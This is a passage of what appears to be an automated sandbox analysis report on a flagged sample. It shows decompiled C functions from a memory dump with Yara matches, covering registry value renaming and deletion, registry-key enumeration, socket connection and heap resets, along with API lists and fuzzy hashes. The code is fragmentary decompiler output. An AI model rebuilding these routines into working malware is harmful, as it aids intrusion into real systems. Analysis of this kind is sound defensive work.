										L22:
										E04EDE947(_t40);
										return 0;
									}
								}
							}
							goto L27;
							L25:
							_t42 = CharNextW(_t42);
						} while ( *_t42 != 0);
						goto L26;
					}
				} else {
					return 0;
				}
				L27:
			}













                                                                                    0x04eb4670
                                                                                    0x04eb4674
                                                                                    0x04eb4686
                                                                                    0x04eb468c
                                                                                    0x04eb4693
                                                                                    0x04eb46a0
                                                                                    0x04eb46aa
                                                                                    0x04eb46b2
                                                                                    0x04eb4712
                                                                                    0x04eb4714
                                                                                    0x04eb4718
                                                                                    0x04eb4718
                                                                                    0x04eb471e
                                                                                    0x04eb4725
                                                                                    0x04eb4725
                                                                                    0x04eb471e
                                                                                    0x04eb46bb
                                                                                    0x04eb46bb
                                                                                    0x04eb46bf
                                                                                    0x04eb46bf
                                                                                    0x04eb46c5
                                                                                    0x04eb46c7
                                                                                    0x04eb46d0
                                                                                    0x04eb46d2
                                                                                    0x04eb46d8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb46d8
                                                                                    0x04eb46c7
                                                                                    0x04eb46da
                                                                                    0x04eb46de
                                                                                    0x04eb46e1
                                                                                    0x04eb46e8
                                                                                    0x04eb46ea
                                                                                    0x04eb46f0
                                                                                    0x04eb46f7
                                                                                    0x04eb46f9
                                                                                    0x04eb46ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb46ff
                                                                                    0x04eb46f0
                                                                                    0x04eb4701
                                                                                    0x04eb4705
                                                                                    0x04eb4708
                                                                                    0x04eb4708
                                                                                    0x04eb472c
                                                                                    0x04eb478a
                                                                                    0x04eb478b
                                                                                    0x04eb4799
                                                                                    0x04eb4730
                                                                                    0x04eb4730
                                                                                    0x04eb4734
                                                                                    0x00000000
                                                                                    0x04eb4736
                                                                                    0x04eb4739
                                                                                    0x04eb473c
                                                                                    0x04eb4745
                                                                                    0x04eb4775
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4747
                                                                                    0x04eb4752
                                                                                    0x04eb4777
                                                                                    0x04eb477c
                                                                                    0x00000000
                                                                                    0x04eb4761
                                                                                    0x04eb4761
                                                                                    0x04eb4762
                                                                                    0x04eb4770
                                                                                    0x04eb4770
                                                                                    0x04eb4752
                                                                                    0x04eb4745
                                                                                    0x00000000
                                                                                    0x04eb477f
                                                                                    0x04eb4782
                                                                                    0x04eb4784
                                                                                    0x00000000
                                                                                    0x04eb4730
                                                                                    0x04eb4696
                                                                                    0x04eb469a
                                                                                    0x04eb469a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,04EB572D,?,?,?,?), ref: 04EB4679
                                                                                    • lstrcpyW.KERNEL32 ref: 04EB46A0
                                                                                    • CharNextW.USER32(00000004), ref: 04EB46CE
                                                                                    • CharNextW.USER32(00000006), ref: 04EB46F7
                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 04EB473C
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04EB474A
                                                                                    • GetLastError.KERNEL32 ref: 04EB4754
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 227312388-0
                                                                                    • Opcode ID: fadc5f7bc5bd2932d39c0e3e9aba1adc40c3f5677547804b5a792cbafac6fc54
                                                                                    • Instruction ID: cf951470695312ee83ddaca977e8144f91117901c836dd7f397d2ff3683c7fb5
                                                                                    • Opcode Fuzzy Hash: fadc5f7bc5bd2932d39c0e3e9aba1adc40c3f5677547804b5a792cbafac6fc54
                                                                                    • Instruction Fuzzy Hash: C43105319002229ADF206F65A844AF7B3F8FF82769B40512AEDD4970D1E775B881C7E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC0A40, Relevance: 12.1, APIs: 8, Instructions: 95registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E04EC0A40(void* __ebx, void* __ecx, short* __edx, short* _a4, short* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				void* __esi;
				int* _t25;
				void* _t26;
				int _t34;
				int _t37;
				long _t39;
				char* _t41;
				short* _t43;
				int* _t47;
				void* _t49;

				_t45 = __ecx;
				_v8 = 0;
				_t47 = 0;
				_v16 = 0;
				_v12 = 0;
				_t48 = 0;
				_t25 = RegOpenKeyExW(__ecx, __edx, 0, 0x103,  &_v8);
				if(_t25 != 0) {
					L11:
					_t26 = _v8;
					if(_t26 != 0) {
						RegCloseKey(_t26);
					}
					if(_t48 != 0) {
						E04ED573F(_t48);
					}
					return _t47;
				}
				_t43 = _a8;
				if(RegQueryValueExW(_v8, _t43, _t25, _t25, _t25, _t25) != 2 || RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
					L10:
					goto L11;
				} else {
					_t34 = _v12;
					_t54 = _t34;
					if(_t34 != 0) {
						_push(_t34);
						_t41 = E04ED5785(_t45, 0, _t54);
						_t49 = _t49 + 4;
						_t48 = _t41;
					}
					_t37 = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t48,  &_v12);
					if(_t37 == 0 && RegSetValueExW(_v8, _t43, _t37, _v16, _t48, _v12) == 0) {
						_t39 = RegDeleteValueW(_v8, _a4);
						if(_t39 != 0) {
							RegDeleteValueW(_v8, _t43);
						} else {
							_t21 = _t39 + 1; // 0x1
							_t47 = _t21;
						}
					}
					goto L10;
				}
			}
















                                                                                    0x04ec0a40
                                                                                    0x04ec0a4b
                                                                                    0x04ec0a58
                                                                                    0x04ec0a5a
                                                                                    0x04ec0a64
                                                                                    0x04ec0a6b
                                                                                    0x04ec0a6d
                                                                                    0x04ec0a75
                                                                                    0x04ec0b0f
                                                                                    0x04ec0b0f
                                                                                    0x04ec0b14
                                                                                    0x04ec0b17
                                                                                    0x04ec0b17
                                                                                    0x04ec0b1f
                                                                                    0x04ec0b22
                                                                                    0x04ec0b27
                                                                                    0x04ec0b31
                                                                                    0x04ec0b31
                                                                                    0x04ec0a7c
                                                                                    0x04ec0a90
                                                                                    0x04ec0b0e
                                                                                    0x00000000
                                                                                    0x04ec0aac
                                                                                    0x04ec0aac
                                                                                    0x04ec0aaf
                                                                                    0x04ec0ab1
                                                                                    0x04ec0ab3
                                                                                    0x04ec0ab4
                                                                                    0x04ec0ab9
                                                                                    0x04ec0abc
                                                                                    0x04ec0abc
                                                                                    0x04ec0acf
                                                                                    0x04ec0ad7
                                                                                    0x04ec0af5
                                                                                    0x04ec0afd
                                                                                    0x04ec0b08
                                                                                    0x04ec0aff
                                                                                    0x04ec0aff
                                                                                    0x04ec0aff
                                                                                    0x04ec0aff
                                                                                    0x04ec0afd
                                                                                    0x00000000
                                                                                    0x04ec0ad7

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04EC0A6D
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0A87
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AA2
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0ACF
                                                                                    • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AE5
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AF5
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0B08
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04EC0B17
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Value$Query$Delete$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2816288289-0
                                                                                    • Opcode ID: abf18d4d8570c7e156053eaa3da55e2444bf882862c8d79f113d16d1275b858b
                                                                                    • Instruction ID: fe23e4224b300c0bbb261a6b699ac9d438747bd2f351a32f2ec51c5a93a23c73
                                                                                    • Opcode Fuzzy Hash: abf18d4d8570c7e156053eaa3da55e2444bf882862c8d79f113d16d1275b858b
                                                                                    • Instruction Fuzzy Hash: F7311AB1A00108FBEB209FA1DE48EAEBBBDEB44649F104069FD15E2010D735AF55DB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECECF0, Relevance: 12.1, APIs: 8, Instructions: 68networkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 16%
                                                                                    			E04ECECF0(void* __eax, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t14;
				long _t19;
				intOrPtr _t21;
				intOrPtr* _t31;

				_t31 = __ecx;
				if(_a8 == 0) {
					_t14 = _a4;
					_t24 =  !=  ? 0x1c : 0x10;
					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t14,  !=  ? 0x1c : 0x10);
					if(_t14 == 0xffffffff) {
						goto L10;
					} else {
						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
						if(_t14 == 0xffffffff) {
							goto L10;
						} else {
							 *((intOrPtr*)(__ecx + 0x4c)) = 1;
							 *((intOrPtr*)(__ecx + 0x50)) = 1;
							SetLastError(0);
							if( *((intOrPtr*)( *_t31 + 0x7c))() != 2) {
								goto L5;
							} else {
								_t19 = GetLastError();
								_t20 =  ==  ? 0x4c7 : _t19;
								__imp__#112( ==  ? 0x4c7 : _t19);
								goto L10;
							}
						}
					}
				} else {
					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
					if(__eax == 0xffffffff) {
						L10:
						return 0;
					} else {
						_t21 = _a4;
						_t28 =  !=  ? 0x1c : 0x10;
						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t21,  !=  ? 0x1c : 0x10);
						if(_t21 == 0) {
							L5:
							return 1;
						} else {
							if(_t21 != 0xffffffff) {
								goto L10;
							} else {
								__imp__#111();
								if(_t21 != 0x2733) {
									goto L10;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}







                                                                                    0x04ececf8
                                                                                    0x04ececfa
                                                                                    0x04eced56
                                                                                    0x04eced67
                                                                                    0x04eced6f
                                                                                    0x04eced78
                                                                                    0x00000000
                                                                                    0x04eced7a
                                                                                    0x04eced82
                                                                                    0x04eced8b
                                                                                    0x00000000
                                                                                    0x04eced8d
                                                                                    0x04eced8d
                                                                                    0x04eced96
                                                                                    0x04eced9d
                                                                                    0x04ecedad
                                                                                    0x00000000
                                                                                    0x04ecedaf
                                                                                    0x04ecedaf
                                                                                    0x04ecedbc
                                                                                    0x04ecedc0
                                                                                    0x00000000
                                                                                    0x04ecedc0
                                                                                    0x04ecedad
                                                                                    0x04eced8b
                                                                                    0x04ececfc
                                                                                    0x04eced04
                                                                                    0x04eced0d
                                                                                    0x04ecedc6
                                                                                    0x04ecedca
                                                                                    0x04eced13
                                                                                    0x04eced13
                                                                                    0x04eced24
                                                                                    0x04eced2c
                                                                                    0x04eced34
                                                                                    0x04eced4c
                                                                                    0x04eced53
                                                                                    0x04eced36
                                                                                    0x04eced39
                                                                                    0x00000000
                                                                                    0x04eced3f
                                                                                    0x04eced3f
                                                                                    0x04eced4a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eced4a
                                                                                    0x04eced39
                                                                                    0x04eced34
                                                                                    0x04eced0d

                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECED04
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECED2C
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECED3F
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECED6F
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECED82
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECED9D
                                                                                    • GetLastError.KERNEL32 ref: 04ECEDAF
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 04ECEDC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EventSelectconnect
                                                                                    • String ID:
                                                                                    • API String ID: 371153081-0
                                                                                    • Opcode ID: 70a8d2ce6ba15a457240793eecc0c881429404e37b974f645faddcaecd071699
                                                                                    • Instruction ID: 4bcb072debdc0fb81b64795fe78b1d4580949d74e90eece616272f4280d24e30
                                                                                    • Opcode Fuzzy Hash: 70a8d2ce6ba15a457240793eecc0c881429404e37b974f645faddcaecd071699
                                                                                    • Instruction Fuzzy Hash: 4B21D230200600DFEB345F38E809B6A7BA6FF80326F104A1DF966C66E0D779EC528B10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECE430, Relevance: 12.0, APIs: 8, Instructions: 49memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04ECE430(void* __ecx) {
				void* __ebx;
				void* _t27;
				int _t29;
				void* _t32;
				struct _CRITICAL_SECTION* _t39;

				_t32 = __ecx;
				_t39 = __ecx + 0x14c;
				EnterCriticalSection(_t39);
				_t21 =  *((intOrPtr*)(_t32 + 0x5c));
				if( *((intOrPtr*)(_t32 + 0x5c)) != 0) {
					E04EDE947(_t21);
					 *((intOrPtr*)(_t32 + 0x5c)) = 0;
					 *((intOrPtr*)(_t32 + 0x60)) = 0;
					 *((intOrPtr*)(_t32 + 0x64)) = 0;
				}
				ResetEvent( *(_t32 + 0x174));
				ResetEvent( *(_t32 + 0x178));
				ResetEvent( *(_t32 + 0x17c));
				E04EBAC50(_t32 + 0x164);
				E04EBACB0(_t32, _t32 + 0x84);
				_t27 =  *(_t32 + 0x68);
				if(_t27 != 0) {
					HeapDestroy(_t27);
				}
				 *(_t32 + 0x68) = HeapCreate( *(_t32 + 0x6c),  *(_t32 + 0x70),  *(_t32 + 0x74));
				 *((intOrPtr*)(_t32 + 0x180)) = 0;
				 *((intOrPtr*)(_t32 + 0x188)) = 0;
				 *((intOrPtr*)(_t32 + 0x184)) = 0;
				 *((intOrPtr*)(_t32 + 0x50)) = 3;
				_t29 = SetEvent( *(_t32 + 4));
				LeaveCriticalSection(_t39);
				return _t29;
			}








                                                                                    0x04ece431
                                                                                    0x04ece434
                                                                                    0x04ece43b
                                                                                    0x04ece441
                                                                                    0x04ece446
                                                                                    0x04ece449
                                                                                    0x04ece451
                                                                                    0x04ece458
                                                                                    0x04ece45f
                                                                                    0x04ece45f
                                                                                    0x04ece473
                                                                                    0x04ece47b
                                                                                    0x04ece483
                                                                                    0x04ece48b
                                                                                    0x04ece496
                                                                                    0x04ece49b
                                                                                    0x04ece4a1
                                                                                    0x04ece4a4
                                                                                    0x04ece4a4
                                                                                    0x04ece4b9
                                                                                    0x04ece4bf
                                                                                    0x04ece4c9
                                                                                    0x04ece4d3
                                                                                    0x04ece4dd
                                                                                    0x04ece4e4
                                                                                    0x04ece4eb
                                                                                    0x04ece4f3

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Reset$CriticalHeapSection$CreateDestroyEnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 836899767-0
                                                                                    • Opcode ID: 15d3c53c45b40df35605290aff44ccbedb3bd54b0333ba487a64b4dd6502edf9
                                                                                    • Instruction ID: fa205012d97b27ae25a34dd5169b22975f4f2e74c482f21dc001be21112ea7d0
                                                                                    • Opcode Fuzzy Hash: 15d3c53c45b40df35605290aff44ccbedb3bd54b0333ba487a64b4dd6502edf9
                                                                                    • Instruction Fuzzy Hash: 6211DA71501200EFEF41AF65D988B9A3BA9FF84305F0440B9ED098E25ADB3A9915DFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECF560, Relevance: 12.0, APIs: 8, Instructions: 48memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04ECF560(void* __ecx) {
				void* __ebx;
				void* _t26;
				int _t28;
				void* _t31;
				struct _CRITICAL_SECTION* _t38;

				_t31 = __ecx;
				_t38 = __ecx + 0x14c;
				EnterCriticalSection(_t38);
				_t20 =  *((intOrPtr*)(_t31 + 0x5c));
				if( *((intOrPtr*)(_t31 + 0x5c)) != 0) {
					E04EDE947(_t20);
					 *((intOrPtr*)(_t31 + 0x5c)) = 0;
					 *((intOrPtr*)(_t31 + 0x60)) = 0;
					 *((intOrPtr*)(_t31 + 0x64)) = 0;
				}
				ResetEvent( *(_t31 + 0x174));
				ResetEvent( *(_t31 + 0x178));
				ResetEvent( *(_t31 + 0x17c));
				E04EBAC50(_t31 + 0x164);
				E04EBACB0(_t31, _t31 + 0x84);
				_t26 =  *(_t31 + 0x68);
				if(_t26 != 0) {
					HeapDestroy(_t26);
				}
				 *(_t31 + 0x68) = HeapCreate( *(_t31 + 0x6c),  *(_t31 + 0x70),  *(_t31 + 0x74));
				 *((intOrPtr*)(_t31 + 0x180)) = 0;
				 *((intOrPtr*)(_t31 + 0x184)) = 0;
				 *((intOrPtr*)(_t31 + 0x50)) = 3;
				_t28 = SetEvent( *(_t31 + 4));
				LeaveCriticalSection(_t38);
				return _t28;
			}








                                                                                    0x04ecf561
                                                                                    0x04ecf564
                                                                                    0x04ecf56b
                                                                                    0x04ecf571
                                                                                    0x04ecf576
                                                                                    0x04ecf579
                                                                                    0x04ecf581
                                                                                    0x04ecf588
                                                                                    0x04ecf58f
                                                                                    0x04ecf58f
                                                                                    0x04ecf5a3
                                                                                    0x04ecf5ab
                                                                                    0x04ecf5b3
                                                                                    0x04ecf5bb
                                                                                    0x04ecf5c6
                                                                                    0x04ecf5cb
                                                                                    0x04ecf5d1
                                                                                    0x04ecf5d4
                                                                                    0x04ecf5d4
                                                                                    0x04ecf5e9
                                                                                    0x04ecf5ef
                                                                                    0x04ecf5f9
                                                                                    0x04ecf603
                                                                                    0x04ecf60a
                                                                                    0x04ecf611
                                                                                    0x04ecf619

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Reset$CriticalHeapSection$CreateDestroyEnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 836899767-0
                                                                                    • Opcode ID: d4780c627fed52df9a4a7e0e4a770ec8338107dc03138a053da0a4f2132fd417
                                                                                    • Instruction ID: 207920127068b77c39ad54f5073a83ebfd452897870de89426e6dbe6e0c96b73
                                                                                    • Opcode Fuzzy Hash: d4780c627fed52df9a4a7e0e4a770ec8338107dc03138a053da0a4f2132fd417
                                                                                    • Instruction Fuzzy Hash: DF11EC71501200AFEF41AF65DD88B9A3B65FF84305F0441B9ED098E25ADB369915DFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC1640, Relevance: 10.7, APIs: 7, Instructions: 194registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			E04EC1640(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				short* _v532;
				short* _v536;
				short* _v540;
				void* _v544;
				int _v548;
				int _v552;
				void* _v556;
				short* _v560;
				intOrPtr _v564;
				signed int _t61;
				short* _t64;
				short* _t73;
				int* _t83;
				intOrPtr* _t84;
				void* _t102;
				int _t103;
				void** _t105;
				short** _t110;
				intOrPtr _t113;
				void* _t117;
				short* _t120;
				short* _t121;
				void* _t122;
				short* _t125;
				short* _t126;
				void* _t128;
				intOrPtr* _t129;
				intOrPtr _t131;
				short* _t132;
				void* _t134;
				signed int _t137;
				void* _t138;
				void* _t139;

				_t61 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t61 ^ _t137;
				_t131 = _a8;
				_t119 = _a4;
				_v564 = __ecx;
				_v532 = 0;
				_t105 = _a4 + 1;
				_t64 = _t131 - 1 + _t105;
				_v536 = _t105;
				_v540 = _t64;
				if(_t64 - _t105 >= 4) {
					_t102 =  *_t105;
					_v536 =  &(_t105[1]);
				} else {
					_v532 = 1;
					_t102 = 0;
				}
				_v560 = E04EC0CE0( &_v540);
				if(_v532 != 0) {
					L20:
					return E04ED572E(_v8 ^ _t137);
				} else {
					_t110 =  &_v540;
					_v548 = 0;
					_v532 = 0;
					_v540 = 0;
					_v536 = 0;
					E04EBB9A0(_t110, _t131);
					_t120 = _v536;
					E04EDDC90(_t120, _t119, _t131);
					_t139 = _t138 + 0xc;
					_t121 = _t120 + _t131;
					_v536 = _t121;
					if(RegOpenKeyExW(_t102, _v560, 0, 0x20119,  &_v544) != 0) {
						L13:
						_t72 = _v560;
						if(_v560 != 0) {
							E04ED573F(_t72);
							_t139 = _t139 + 4;
						}
						_t132 = _v540;
						if(_t132 != 0) {
							_t122 = _t121 - _t132;
							_t73 = _t132;
						} else {
							_t122 = 0;
							_t73 = 0;
						}
						_push(_t110);
						_push(0x3f);
						_push(_t122);
						_push(_t73);
						E04EB1C60( *((intOrPtr*)(_v564 + 4)));
						if(_t132 != 0) {
							E04ED573F(_t132);
						}
						goto L20;
					}
					_t103 = 0;
					_v552 = 0x104;
					if(RegEnumKeyExW(_v544, 0,  &_v528,  &_v552, 0, 0, 0, 0) != 0) {
						L12:
						RegCloseKey(_v544);
						goto L13;
					}
					asm("o16 nop [eax+eax]");
					do {
						_v548 = 0;
						_t103 = _t103 + 1;
						_t83 = RegOpenKeyExW(_v544,  &_v528, 0, 0x20119,  &_v556);
						if(_t83 == 0) {
							RegQueryInfoKeyW(_v556, 0, 0, 0,  &_v548, _t83, _t83, _t83, _t83, _t83, _t83, _t83);
							RegCloseKey(_v556);
						}
						_t84 =  &_v528;
						_t117 = _t84 + 2;
						do {
							_t113 =  *_t84;
							_t84 = _t84 + 2;
						} while (_t113 != 0);
						_t134 = 2 + (_t84 - _t117 >> 1) * 2;
						_t124 =  ==  ? 0 : _t121 - _v540;
						E04EBB9A0( &_v540, ( ==  ? 0 : _t121 - _v540) + _t134);
						_t125 = _v536;
						E04EDDC90(_t125,  &_v528, _t134);
						_t126 = _t125 + _t134;
						_v536 = _t126;
						_t139 = _t139 + 0xc;
						_t128 =  ==  ? 0 : _t126 - _v540;
						_t110 =  &_v540;
						_t48 = _t128 + 4; // 0x4
						E04EBB9A0(_t110, _t48);
						_t129 = _v536;
						 *_t129 = _v548;
						_t121 = _t129 + 4;
						_v552 = 0x104;
						_v536 = _t121;
					} while (RegEnumKeyExW(_v544, _t103,  &_v528,  &_v552, 0, 0, 0, 0) == 0);
					goto L12;
				}
			}






































                                                                                    0x04ec1649
                                                                                    0x04ec1650
                                                                                    0x04ec1655
                                                                                    0x04ec1659
                                                                                    0x04ec165c
                                                                                    0x04ec1665
                                                                                    0x04ec166f
                                                                                    0x04ec1672
                                                                                    0x04ec1674
                                                                                    0x04ec167a
                                                                                    0x04ec1685
                                                                                    0x04ec1695
                                                                                    0x04ec169a
                                                                                    0x04ec1687
                                                                                    0x04ec1687
                                                                                    0x04ec1691
                                                                                    0x04ec1691
                                                                                    0x04ec16b2
                                                                                    0x04ec16b8
                                                                                    0x04ec18e3
                                                                                    0x04ec18f3
                                                                                    0x04ec16be
                                                                                    0x04ec16bf
                                                                                    0x04ec16c5
                                                                                    0x04ec16cf
                                                                                    0x04ec16d9
                                                                                    0x04ec16e3
                                                                                    0x04ec16ed
                                                                                    0x04ec16f4
                                                                                    0x04ec16fb
                                                                                    0x04ec1700
                                                                                    0x04ec1709
                                                                                    0x04ec170b
                                                                                    0x04ec1728
                                                                                    0x04ec189c
                                                                                    0x04ec189c
                                                                                    0x04ec18a4
                                                                                    0x04ec18a7
                                                                                    0x04ec18ac
                                                                                    0x04ec18ac
                                                                                    0x04ec18af
                                                                                    0x04ec18b7
                                                                                    0x04ec18bf
                                                                                    0x04ec18c1
                                                                                    0x04ec18b9
                                                                                    0x04ec18b9
                                                                                    0x04ec18bb
                                                                                    0x04ec18bb
                                                                                    0x04ec18c3
                                                                                    0x04ec18ca
                                                                                    0x04ec18cc
                                                                                    0x04ec18cd
                                                                                    0x04ec18d1
                                                                                    0x04ec18d8
                                                                                    0x04ec18db
                                                                                    0x04ec18e0
                                                                                    0x00000000
                                                                                    0x04ec18d8
                                                                                    0x04ec172e
                                                                                    0x04ec1730
                                                                                    0x04ec1761
                                                                                    0x04ec1894
                                                                                    0x04ec189a
                                                                                    0x00000000
                                                                                    0x04ec189a
                                                                                    0x04ec1767
                                                                                    0x04ec1770
                                                                                    0x04ec1776
                                                                                    0x04ec178e
                                                                                    0x04ec1796
                                                                                    0x04ec179e
                                                                                    0x04ec17ba
                                                                                    0x04ec17c6
                                                                                    0x04ec17c6
                                                                                    0x04ec17c8
                                                                                    0x04ec17ce
                                                                                    0x04ec17d1
                                                                                    0x04ec17d1
                                                                                    0x04ec17d4
                                                                                    0x04ec17d7
                                                                                    0x04ec17e2
                                                                                    0x04ec17f3
                                                                                    0x04ec1800
                                                                                    0x04ec1805
                                                                                    0x04ec1814
                                                                                    0x04ec181f
                                                                                    0x04ec1829
                                                                                    0x04ec182f
                                                                                    0x04ec1836
                                                                                    0x04ec1839
                                                                                    0x04ec183f
                                                                                    0x04ec1843
                                                                                    0x04ec1848
                                                                                    0x04ec1863
                                                                                    0x04ec186d
                                                                                    0x04ec1870
                                                                                    0x04ec187a
                                                                                    0x04ec188c
                                                                                    0x00000000
                                                                                    0x04ec1770

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04EC1720
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000000,00020119,?), ref: 04EC1753
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,?,?,00000000,00020119,?), ref: 04EC1796
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 04EC17BA
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04EC17C6
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000104,00000000,00000000,00000000,00000000,00000004,00000000,00020119,?), ref: 04EC1880
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04EC189A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEnumOpen$InfoQuery
                                                                                    • String ID:
                                                                                    • API String ID: 396531129-0
                                                                                    • Opcode ID: 9be8220d6aa676a115dcac4cf5973fc5deb11483e26ac94f56506ca75afdce08
                                                                                    • Instruction ID: baa0f76ea03fdb252f9deb68402f6e88f21022bf3abd80821c25ad3315334614
                                                                                    • Opcode Fuzzy Hash: 9be8220d6aa676a115dcac4cf5973fc5deb11483e26ac94f56506ca75afdce08
                                                                                    • Instruction Fuzzy Hash: 9971337194122DAFEB209F64DD88BEAB7B8EF54308F1001E9E909A7151D770AF85CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEE9AE, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E04EEE9AE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4f06680 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
